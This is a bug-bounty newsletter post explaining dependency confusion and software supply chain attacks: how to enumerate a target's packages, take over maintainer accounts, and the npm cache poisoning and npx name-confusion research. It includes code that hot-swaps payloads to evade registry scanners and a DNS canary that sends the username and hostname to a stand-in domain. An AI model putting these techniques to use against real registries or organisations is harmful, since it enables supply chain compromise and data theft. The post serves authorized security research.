[HackerNotes Ep. 74] Supply Chain Attack Primer - Popping RCE Without an HTTP Request

Check out all things supply chain and dependency confusion below.

Hacker TLDR;

  • Depi: Lupin and his team have been doing extensive research in the realm of supply chain security. This bred a new tool, Depi, targeted at organisations looking to up their supply chain security. It’s not publicly available yet, but you can check out the tool and research from the team here: https://www.landh.tech/depi/

  • Supply Chain & Dependency Confusion Attacks: At a high level, the supply chain attack surface can be broken down into three main phases. These phases and their associated threats are:

    • Source: Submitting unauthorised changes, compromising the source repo, building from a modified source.

    • Build: Using a compromised dependency.

    • Package: Compromise of the build process, uploading a modified package, compromising the package registry, and using a compromised package. We dive into all of these below.

  • Dependency & CI/CD Research:

  • Enumerating Packages: Enumerating the packages an application uses is the first step in identifying dependency confusion. Some ways to enumerate these are via:

    • Artifactory files: Checking for package.json, requirements.txt and all other associated files in publicly accessible repos of the target.

    • Fuzzing: Files such as package.json or requirements.txt are often left accessible in the webroot of an app. Adding these to your quick hits wordlist can provide some solid leads.

    • Git history: Searching through all of the commits in the Git history can reveal old files and packages which may be forgotten about but still used. A tool to help do this: https://github.com/tomnomnom/dotfiles/blob/master/scripts/git-dump

    • Public Repo Search: Searching for unique strings associated with your target such as microservice names, hostnames of any internal artifactory enumerated, or using searches such as package-lock.json <artifactory name> can reveal publicly accessible files on GitHub.

Depi

You might have seen it on X, but a lot of the research below from Lupin was bred from Depi. Depi is a supply chain analysis tool built for supply chain-based threats, geared primarily towards organisations (so unfortunately no open source tool, before anyone asks). If you haven’t checked it out, there’s some cool research from the team over at Depi here: https://www.landh.tech/blog

Depi isn’t released yet but you can join the waiting list if you think it’s something your org might benefit from.

Let's jump into some supply chain hacking!

Supply Chain & Dependency Confusion Attacks

The goal of dependency confusion is to hijack a package used by the application or codebase you’re looking at. The original research was bred from an LHE (live hacking event) by Alex Birsan and can be found here: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610

Now when it comes to packages, there are two places to publish one - a public registry (what you’d use when running a pip install on a personal device, for example), or an artifactory (a private registry). Organisations use a private registry internally to help manage and publish code for internal developers.

This is where dependency confusion attacks come in. If a package manager can choose between a package in a public registry with a higher version number and one in a private registry with a lower version number, which one does it pick? In many default configurations the answer is the higher public version - and that’s exactly the behaviour this attack abuses.
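As a minimal sketch of that resolution logic, here is a naive resolver that simply takes the highest version number regardless of which index it came from - the index names and versions below are made up for illustration, and real resolvers are more nuanced:

```python
# Sketch of the dependency-confusion core: a naive resolver that, given
# candidate versions from a private and a public index, just picks the
# highest version. Index names and versions here are hypothetical.

def parse_version(v: str) -> tuple:
    """Turn '1.2.3' into (1, 2, 3) for comparison (simplified semver)."""
    return tuple(int(part) for part in v.split("."))

def naive_resolve(candidates: dict) -> str:
    """candidates maps index name -> version string; picks the highest version."""
    return max(candidates, key=lambda idx: parse_version(candidates[idx]))

# Private registry hosts 1.4.0; an attacker publishes 99.0.0 publicly:
winner = naive_resolve({"private-artifactory": "1.4.0", "public-registry": "99.0.0"})
print(winner)  # the attacker-controlled public package wins
```

The whole attack hinges on that `max()`: nothing in the naive logic prefers the private index, so a higher public version silently shadows the internal package.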

Understanding the attack surface

There are three main attack surfaces to understand in supply chain attacks: the source, the build and the package. It can be broken down into the following steps:

Note: If you’d like to deep dive into the whole supply chain ecosystem, check out this resource: https://slsa.dev/

The source is everything related to the artifactory and registry - think JFrog, npm, PyPI and so on. An artifactory is where all private dependencies are hosted, and where you’d publish all your internal packages. We also have the (public) registry, which is where the artifactory pulls public packages from if they don’t exist internally.

The build is where you pull from the source and build: everything from the previous step - code and dependencies alike - is pulled in and bundled together. This is also where the CI tooling comes in, like GitHub Actions, Travis CI and so on.

The package is produced once everything has been built and can be used, and this can be used as a dependency for another build.

There have been a lot of interesting attacks around the build aspect of the above process. Think about what’s happening in the build process - code being tested, code being built - all of it has to be executed somewhere, which means all dependencies, malicious or not, are being executed too.

Take pushing code to a project as an example: there are often actions or build processes associated with the push to ensure code meets certain requirements and actually works. From an attacker’s perspective, this allows you to push code and have it executed in one form or another in the context of the project, which is why this area can be quite a fruitful path to hack in.

If you'd like some good research outlining the exploitation of GitHub actions check it out below:

Both pieces of research highlight exactly how the build and test processes in this step of the process can be flipped on their heads and exploited.

One of the big questions, however, is how can we enumerate what packages are being used in the first place?

Enumerating the Scope

Figuring out what packages an app or org uses is naturally the first step in figuring out if we can introduce a malicious package. There are a few different ways to do that, broken down below:

Artifactory files

Anything from files such as package.json, yarn.lock, requirements.txt and so on can indicate what packages are being used. These can be found in public repos of your target, or sometimes even on the target’s web apps - but more on this shortly.

Fuzzing

Lots of targets expose their webroot which is more often than not where package.json and other related files live - add these files to your quick hits wordlist to make sure you don’t miss an easy win.
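As a rough sketch, building those quick-hit candidates could look like the following - the manifest file names are standard ecosystem conventions, while the target host is a placeholder you’d swap for your own scope (and you’d feed the URLs into whatever fuzzer you prefer):

```python
# Sketch: generate "quick hits" URLs for dependency manifests that are
# often left accessible in a webroot. File names are real ecosystem
# conventions; the base URL below is a hypothetical target.

MANIFEST_FILES = [
    "package.json", "package-lock.json", "yarn.lock",
    "requirements.txt", "Pipfile", "Pipfile.lock",
    "composer.json", "Gemfile", "Gemfile.lock", "go.mod",
]

def quick_hit_urls(base: str) -> list:
    """Build webroot URLs to probe for exposed manifest files."""
    return [f"{base.rstrip('/')}/{name}" for name in MANIFEST_FILES]

for url in quick_hit_urls("https://target.example"):
    print(url)  # feed these into your fuzzer of choice
```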

Another vector is the package.json ending up in the front end directly. Some libraries bundle the package.json file into the front end as a string or object, which means you can simply go into the JS, pull all the strings and view all the packages.

Equally, keep a lookout for .map files too - a .map file is JSON which includes a sources key listing the original file paths (and often the source code itself). From the sources key, you can read off the names of the packages.
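Per the source map spec, the "sources" array holds the original file paths, and bundlers typically emit entries like `webpack:///./node_modules/<package>/…`, so package names can be pulled out mechanically. A sketch, with an entirely made-up example map:

```python
import json

# Sketch: extract dependency names from a JS source map's "sources" array.
# Bundler path formats vary; the webpack:///./node_modules/ style below is
# a common one, and the example map content is invented.

def packages_from_sourcemap(map_text: str) -> set:
    """Return package names found under node_modules/ in a .map file."""
    sources = json.loads(map_text).get("sources", [])
    pkgs = set()
    for path in sources:
        if "node_modules/" in path:
            tail = path.split("node_modules/", 1)[1]
            parts = tail.split("/")
            # Scoped packages (@scope/name) span two path segments
            name = "/".join(parts[:2]) if parts[0].startswith("@") else parts[0]
            pkgs.add(name)
    return pkgs

example = json.dumps({"version": 3, "sources": [
    "webpack:///./node_modules/left-pad/index.js",
    "webpack:///./node_modules/@acme/internal-ui/button.js",
    "webpack:///./src/app.js",
]})
print(packages_from_sourcemap(example))  # both node_modules packages; app code ignored
```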

Git History

Checking all Git history can be very fruitful. The git-dump tool by Tomnomnom goes through and pulls every single file that has ever existed in a given repo. Comparing files such as package.json over time can give you an idea of what dependencies might be forgotten about, and in bigger orgs you can almost guarantee there are old builds kicking around that still reference them.

If any of these older packages are vulnerable and forgotten about, they can still provide a foothold to the target.

One thing to consider here when looking at repos is to check out all the branches. Some bigger and more complex orgs have numerous branches for different versions they support for varying requirements - each of these can have its own set of dependencies specified.
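A sketch of this workflow - walking every historical version of package.json in a clone and flagging dependencies that were dropped along the way. The git plumbing calls are standard, but the helper names are made up, and this assumes you run it inside a checked-out repo:

```python
import json
import subprocess

# Sketch: pull every historical package.json from a git repo and compare
# dependency sets over time. Assumes it runs inside a local clone.

def historical_manifests(path: str = "package.json") -> list:
    """Parsed package.json content for every commit that touched it."""
    commits = subprocess.run(
        ["git", "log", "--format=%H", "--", path],
        capture_output=True, text=True, check=True,
    ).stdout.split()
    manifests = []
    for commit in commits:
        blob = subprocess.run(
            ["git", "show", f"{commit}:{path}"],
            capture_output=True, text=True,
        )
        if blob.returncode == 0:  # file may not exist at some commits
            manifests.append(json.loads(blob.stdout))
    return manifests

def dropped_dependencies(old: dict, new: dict) -> set:
    """Dependencies present in an old manifest but gone from the current one."""
    return set(old.get("dependencies", {})) - set(new.get("dependencies", {}))

# e.g. with m = historical_manifests(), dropped_dependencies(m[-1], m[0])
# lists packages the project once used but no longer declares.
```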

Public Repo Search

If you’ve had luck with any of the prior steps you can also search for package names, microservice names or any unique string that correlates to the infrastructure behind the app you’re attacking on GitHub.

Or, if you have found a private artifactory domain you can search for something like: package-lock.json <artifactory name>

If anything comes up, there’s a very high chance it's from devs from the organisation.
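A small sketch of generating those searches - the lockfile names are standard, the artifactory hostname is a placeholder, and note that GitHub’s code-search qualifier syntax has changed over time (legacy search used `filename:`, the newer code search uses `path:`), so adjust to whichever you’re using:

```python
# Sketch: build GitHub code-search queries pairing lockfile names with an
# internal registry hostname you've enumerated. The hostname below is a
# placeholder; paste the queries into GitHub search manually.

def repo_search_queries(artifactory_host: str, extra_terms=()) -> list:
    """Queries likely to surface org files referencing a private registry."""
    lockfiles = ["package-lock.json", "yarn.lock", ".npmrc", "pip.conf"]
    queries = [f'filename:{lf} "{artifactory_host}"' for lf in lockfiles]
    # Unique strings (microservice names etc.) make good extra pivots:
    queries += [f'"{term}" "{artifactory_host}"' for term in extra_terms]
    return queries

for q in repo_search_queries("artifactory.corp.example", ["billing-service"]):
    print(q)
```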

Maintainer attacks

Accounts have to be used to publish and manage these packages regardless of where they live, which also means an additional attack surface against the maintainers. Let’s dive in.

Lapsed Domain

A common behaviour for devs is to have custom domains for their dev work or dedicated projects. With long-standing or forgotten-about open-source projects, these custom domains often slip under the radar and aren’t renewed.

Some legacy accounts and smaller repos don’t implement a requirement for 2FA either, so you could just register the domain and log in to the account.

Weak Credentials & Leaked Tokens

Weak credentials on maintainer accounts can be an easy win for a repository compromise - and so can leaked tokens from maintainers’ accounts. We’ve all seen things accidentally get pushed - tokens, SSH keys, DB connection strings - and with some of these projects being open source but maintained privately, developers sometimes push these kinds of things to other projects by accident.

Developers also tend to think that once they’ve removed the tokens or sensitive files, they’re safe. That isn’t the case: combine this with a Git dump tool such as Tomnomnom’s above and you have a lot of historical data to dig through which could contain secrets. Rotating secrets after a push can also be a lot of work, which might conveniently be forgotten ¯\_(ツ)_/¯

Hosting Packages

Now with all these attacks, how do we get a POC going?

Unfortunately for us, registries now have increased security which automatically scans and bans any new malicious package. The way the Depi team get around this is via hot swapping. If an automated scanner hits the package, they serve a benign package. If the customer (identified via an IP range or some other characteristic) hits the package, they hot-swap it on the fly to include the payload or canary needed to prove the impact.

Alternatively, you can host a benign package for a week or so to make sure all the automated scanners hit it and give it the green light, and then swap it out after. This comes with its own risks however as a package scanner could technically hit it and ban it at any time.
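The serving logic behind that hot-swap idea can be sketched roughly as below. This is purely an illustration of the decision step, not Depi’s actual implementation - the IP range and artifact names are invented, and real scanners vary far more than a single characteristic:

```python
import ipaddress

# Sketch of hot-swap serving logic: everyone gets the benign artifact
# except requests from the customer's known ranges, which get the canary.
# The range and file names below are hypothetical.

CUSTOMER_RANGES = [ipaddress.ip_network("203.0.113.0/24")]

def package_for(client_ip: str) -> str:
    """Decide which artifact to serve based on the requester's IP."""
    addr = ipaddress.ip_address(client_ip)
    if any(addr in net for net in CUSTOMER_RANGES):
        return "canary-payload.tgz"   # proves impact inside the target
    return "benign.tgz"               # what scanners and everyone else see

print(package_for("203.0.113.7"))
print(package_for("198.51.100.9"))
```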

Exfiltration POC

With a hosted package you need some data to exfil to prove the POC. A good exfil channel - no surprise to you red teamers or pen-testers - is DNS. Many targets apply HTTP/HTTPS egress filtering, and since you have no way of knowing in advance, DNS may be the safer option.

HTTPS exfil is a lot easier to set up in contrast, so take your pick. When it comes to actually proving impact, a safe, benign POC would be something like pulling the username and hostname from the machine. Some orgs might not be too happy if you rain a load of shells across their infra, and it could cause a lot of unnecessary headaches for their blue team.
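A minimal sketch of that benign DNS canary - encode the username and hostname into a subdomain of a DNS logging domain you control, and the lookup itself is the exfil. The collaborator domain below is a placeholder; only ever resolve it against infrastructure you own:

```python
import os
import socket

# Sketch: build a DNS canary hostname of the form <user>.<host>.<domain>.
# The logging domain is a placeholder for your own collaborator setup.

def canary_hostname(domain: str) -> str:
    """Encode username and hostname as DNS labels under a domain you control."""
    user = (os.environ.get("USER") or os.environ.get("USERNAME") or "unknown")
    user = user.replace(".", "-").replace("_", "-").lower()
    host = socket.gethostname().split(".")[0].replace("_", "-").lower()
    return f"{user}.{host}.{domain}"

name = canary_hostname("canary.example.com")
print(name)
# The resolution is what leaks the data - your DNS server logs the query:
# socket.gethostbyname(name)  # commented out: only run against infra you own
```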

Supply Chain Research

Npm Cache Poisoning

When you have packages being pulled millions of times, it makes sense to cache them from a computing perspective. When you take a cache in this instance and poison it, you have the potential to affect millions of builds and that's exactly what Lupin has done in this research:

Now this is as big as it comes - NPM itself could be hit, and packages could be poisoned to return a 404 and essentially never work. Think about how popular some packages are and the complexity of some organisations that use them - the availability impact here is huge.

Grafana NPX Confusion

NPX stands for node package execute. Instead of being a manager that installs the package, it runs a binary directly; the primary use case being command-line applications. The interesting thing here is that if you use NPX and do not have the binary locally, it will pull it from the public registry and run it.

Here’s where the confusion comes in: NPX takes a binary name, but the public registry deals in package names, ultimately resulting in a mismatch on the NPX side. For example, let’s say grafana-toolkit is the name of the binary. If it didn’t exist locally, NPX would search for it on the registry. The registry doesn’t use this naming convention - the package is published under a scoped name instead - which means an unscoped package called grafana-toolkit didn’t exist.

As it didn’t exist, Lupin claimed the package name which resulted in his malicious package being pulled. The Grafana team also left some positive comments on the research.
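A sketch of checking that gap yourself: the metadata endpoint is the real public npm registry API (a 404 means nobody has published under that name), but the checker itself is illustrative and not the tooling from the research. The block only defines the check; actually calling it makes a network request:

```python
import urllib.error
import urllib.request

# Sketch: check whether a bare binary name is claimable as an unscoped
# package on the public npm registry - the gap npx falls into when a team
# only publishes under a scoped name.

REGISTRY = "https://registry.npmjs.org"

def registry_url(package: str) -> str:
    """npm metadata endpoint; scoped names need their '/' percent-encoded."""
    return f"{REGISTRY}/{package.replace('/', '%2f')}"

def is_claimable(package: str) -> bool:
    """True if the registry returns 404 for this name (network call)."""
    try:
        urllib.request.urlopen(registry_url(package), timeout=10)
        return False
    except urllib.error.HTTPError as e:
        return e.code == 404

# e.g. is_claimable("grafana-toolkit") would have been True before the
# research - exactly what made the npx confusion exploitable.
```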

Another great episode from the pod this week. Understanding the software supply chain can provide some nice additional attack paths that go outside the standard remit of web app-based hunting, so if your target accepts these types of bugs, keep an eye out for them.

As always, keep hacking!